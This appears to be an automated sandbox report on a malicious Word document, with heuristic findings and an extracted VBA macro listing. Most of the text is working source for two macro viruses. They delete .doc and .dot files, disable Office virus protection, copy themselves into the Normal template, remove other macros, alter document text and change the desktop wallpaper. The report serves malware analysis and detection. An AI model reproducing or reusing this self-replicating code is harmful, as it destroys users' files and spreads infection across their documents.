MALICIOUS
Risk Score: 266
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and VBA macros, indicating a malicious intent to execute code. The 'Document_Open' subroutine is present, which is commonly used to trigger malicious actions upon opening the document. The script attempts to disable virus protection and potentially download further malicious content, as suggested by the ClamAV detections.
Heuristics (8)
- ClamAV: Doc.Trojan.Marker-35 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Trojan.Marker-35
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
  Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION)
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Options.VirusProtection = False
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Document_Open macro (low, OLE_VBA_DOCOPEN)
  Document_Open macro
  Matched line in script: Private Sub Document_Open()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE)
  Auto_Close macro
  Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://www.degriftour.com/ (In document text (OLE body))
  URL: http://www.aircanada.ca/ (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41074 bytes |

SHA-256: f0d004ddb2c37cf075234d3da7d7b0f3425afc194bdb2e0066fb1f87e892b28b

Detection
- ClamAV: Doc.Trojan.Marker-13
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Seline, Where are you dear
Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim Jon, Users, LogData, LogFile As String
On Error Resume Next
AddIns.Unload True
Kill Options.DefaultFilePath(8) & "\*.doc"
Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
Application.UserInitials = "MeMeX"
Application.UserAddress = "JonMMx2000@yahoo.com"
Application.EnableCancelKey = wdCancelDisabled
GoSub InsertIon
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
"LogData in") = False) Then GoSub LoggingIn
If WeekDay(Now()) = 1 Then GoSub ShowMe
GoTo Finish
InsertIon:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DI Then
NTS = NormalTemplate.Saved
Jon = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
For i = 1 To Len(Application.UserAddress)
If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
Users = Users & Mid(Application.UserAddress, i, 1)
End If
Else
Users = Users & Chr(13) & " '"
End If
Next
Jon = Jon & Chr(13) & _
"' " & Format(Time, "hh:mm:sc AMPM-") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & Users & Chr(13) & Chr(13) & " "
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString Jon
If NTS Then NormalTemplate.Save
End If
If NTI Then
DS = ActiveDocument.Saved
Jon = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString Jon
If DS Then ActiveDocument.Save
End If
End If
Return
LoggingIn:
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
GoSub ShowMe
Return
ShowMe:
Dim RootsyS As String
On Error Resume Next
RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
Open RootsyS & "\Jon.html" For Output As #1
Print #1, "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
Print #1, "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
Print #1, "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
Print #1, "<font normal></center>To the very best that happen in mylife<p>"
Print #1, "<p>Long ago and in my mind, I can see your face lonely and lost in time "
Print #1, "<p>You were gone since yester month But the memories, never would dissapear"
Print #1, "<p>I think of you, I THINK OF YOU.<p>"
Print #1, "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
Print #1, "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
Print #1, "<p>Dear Iin, I close my eyes and see your face. That's all I have to do to be with you. "
Print #1, "<p>Dear Iin, altough I can not touch your face. I know what I can do to be with you "
Print #1, "<p>Long ago so faraway. But the light of blue, still living with me today."
Print #1, "<p>You were gone since yester month. But the memories never would dissapear."
Print #1, "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General", "Wallpaper") = RootsyS & "\Jon.html"
Return
Finish:
End Sub
'Logfile -->
' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com
' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:55:459:55:45 AM AM-Wednesday, 25 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:05:474:05:47 AM AM-Thursday, 26 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:41:387:41:38 PM PM-Friday, 27 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:43:2212:43:22 PM PM-Monday, 30 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:02:559:02:55 -Sabtu, 28 Agust 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:16:1314:16:13 -Jumat, 3 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:17:374:17:37 AM AM-Saturday, 4 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:42:399:42:39 PM PM-Monday, 6 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:00:4210:00:42 PM PM-Wednesday, 8 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:19:334:19:33 PM PM-Thursday, 9 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:32:279:32:27 AM AM-Thursday, 16 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:23:111:23:11 PM PM-Wednesday, 6 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:56:212:56:02 PM PM-Friday, 8 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:37:611:37:06 AM AM-Saturday, 9 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:43:710:43:07 PM PM-Thursday, 14 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:30:25:30:02 PM PM-Wednesday, 10 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:17:510:17:05 AM AM-Tuesday, 16 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:17:146:17:14 PM PM-Monday, 15 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:32:467:32:46 PM PM-Thursday, 18 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:06:587:06:58 PM PM-Wednesday, 24 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:38:422:38:42 AM AM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:59:48:59:04 PM PM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:18:221:18:22 -Jumat, 26 Nop 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:51:287:51:28 PM PM-Monday, 29 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:58:510:58:05 -jeudi, 2 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:11:114:11:01 -lundi, 6 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:58:1918:58:19 -mardi, 7 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:43:2714:43:27 -lundi, 13 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:04:5511:04:55 -vendredi, 17 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:10:4114:10:41 -jeudi, 13 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:17:3010:17:30 -vendredi, 14 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:08:5509:08:55 -mardi, 18 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:42:4114:42:41 -vendredi, 21 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:52:2714:52:27 -vendredi, 21 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:41:618:41:06 -mardi, 25 janv 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:46:4515:46:45 -mercredi, 2 févr 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
Attribute VB_Name = "akrnl"
Public Skip As Integer
Sub Akrnl()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If Day(Now()) > 22 Then Call RandomRemplace
End Sub
Sub AutoExec()
On Error Resume Next
Call Sauve
End Sub
Sub AutoNew()
On Error Resume Next
Call Sauve
End Sub
Sub AutoPrint()
On Error Resume Next
Call Sauve
End Sub
Sub FileNew()
On Error Resume Next
Call Sauve
dialogs(wdDialogFileNew).show
Skip = 1
Call Sauve
End Sub
Sub FileClose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
Call Sauve
End Sub
Sub FileExit()
On Error Resume Next
Call Sauve
Application.Quit
End Sub
Sub AutoOpen()
On Error Resume Next
Call Akrnl
Call Sauve
End Sub
Sub AutoExit()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub AutoClose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Call Sauve
End Sub
Sub ToolsMacro()
On Error Resume Next
End Sub
Sub FileTemplates()
On Error Resume Next
End Sub
Sub ViewVBCode()
On Error Resume Next
End Sub
Sub RandomRemplace()
randomize
ValRandom = Int(Rnd * 75)
If ValRandom < 20 Then BesoinRemplace = True
If ValRandom < 20 Then txt = "ainsi, si j'en crois ce que mon incompétant de professeur me dit,"
If ValRandom < 15 Then txt = "ainsi, mon chat a perdu ses dents. De plus,"
If ValRandom < 10 Then txt = "ainsi, selon ma grand-mère,"
If ValRandom < 5 Then txt = "ainsi, la matière du cours est plate. De plus,"
If BesoinRemplace = True Then Call Remplace(txt)
End Sub
Sub Remplace(txt)
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "donc,"
.Replacement.Text = txt
.Forward = True
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceOne
Selection.MoveUp Unit:=wdScreen, Count:=8
End Sub
Sub Sauve()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("akrnl").Export "c:\Étudiant.cfg"
ActiveDocument.ReadOnlyRecommended = False
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
NomMacro = ActiveDocument.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentAct = True Else Call DelVir(NomMacro)
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NomMacro = NormalTemplate.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentNorm = True Else Call DelVir(NomMacro)
Next i
If PrésentAct = True And PrésentNorm = False Then Set BesoinSauve = NormalTemplate.VBProject.VBComponents
If PrésentAct = False And PrésentNorm = True Then Set BesoinSauve = ActiveDocument.VBProject.VBComponents
BesoinSauve.Import "c:\Étudiant.cfg"
If PrésentNorm = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
If PrésentAct = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub DelVir(NomMacro)
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Remove _
Application.VBE.ActiveVBProject.VBComponents(NomMacro)
With Application.NormalTemplate.VBProject
.VBComponents.Remove .VBComponents(NomMacro)
End With
End Sub
' Processing file: /tmp/qstore_2h5d5ahl
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 16942 bytes
…